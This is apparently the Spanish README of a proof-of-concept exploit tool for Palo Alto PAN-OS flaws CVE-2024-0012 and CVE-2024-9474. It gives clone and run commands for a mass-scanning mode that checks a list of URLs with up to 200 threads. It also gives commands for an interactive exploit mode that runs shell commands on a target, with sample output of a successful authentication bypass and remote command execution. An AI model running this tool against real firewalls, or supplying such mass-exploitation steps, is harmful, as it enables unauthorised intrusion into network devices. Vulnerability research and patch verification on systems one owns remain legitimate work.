
Vulnerabilidad RCE en Palo Alto
Este script es un exploit de Prueba de Concepto (PoC) para vulnerabilidades encontradas en Palo Alto PAN-OS (CVE-2024-0012 y CVE-2024-9474). El script se puede utilizar para escanear una lista de URL en busca de la vulnerabilidad o explotar una sola URL vulnerable de forma interactiva.
git clone https://github.com/aratane/CVE-2024-9474
cd CVE-2024-9474
go mod tidy
github.com/cheggaaa/pb/v3: Barra de progreso para mostrar el estado del escaneo. github.com/gookit/color: Soporte de color mejorado para la salida de consola. github.com/manifoldco/promptui: Indicadores interactivos de línea de comandos. github.com/p0dalirius/goopts/parser: Análisis de argumentos de línea de comandos.
Ejecutando en Modo Escaneo (para escanear múltiples URL) El Modo Escaneo se utiliza para verificar múltiples URL en busca de la vulnerabilidad. Debe proporcionar un archivo con una lista de URL.
go run main.go --file urls.txt --output results.txt --threads 100
--file: Ruta al archivo que contiene una lista de URL a escanear. --output: Ruta para guardar los resultados del escaneo (por defecto: output.txt). --threads: Número de hilos concurrentes a utilizar para el escaneo (por defecto: 200).
http://example1.com
http://example2.com
Ejecutando en Modo Exploit (para explotar una sola URL de forma interactiva)
go run main.go --url http://target.com --output results.txt
--url: La URL objetivo a explotar. --output: Ruta para guardar los resultados del exploit. Una vez en el Modo Exploit, puede ingresar comandos para ejecutar en el sistema objetivo. Escriba exit para salir del shell interactivo.
Para mostrar información de ayuda:
go run main.go --help
Después de que el escaneo se complete, los resultados se guardarán en el archivo de salida especificado (por ejemplo, results.txt):
[+] http://example1.com - Auth Bypass exitoso
[+] http://example2.com - Auth Bypass exitoso
Cuando se explota una URL interactivamente, la salida del comando se muestra después de ejecutar comandos en el objetivo:
# ls /var
bin app lib tmp
# exit
[+] Saliendo del shell interactivo.
Argumentos de Línea de Comandos Flag Descripción Valor por Defecto --url La URL a explotar en Modo Exploit --file Archivo con URL a escanear (usado en Modo Escaneo) --output Archivo de salida para guardar resultados output.txt --threads Número de hilos concurrentes para escaneo (Modo Escaneo) 200 --help Mostrar mensaje de ayuda
Este proyecto está licenciado bajo la Licencia MIT - consulte el archivo LICENSE para más detalles.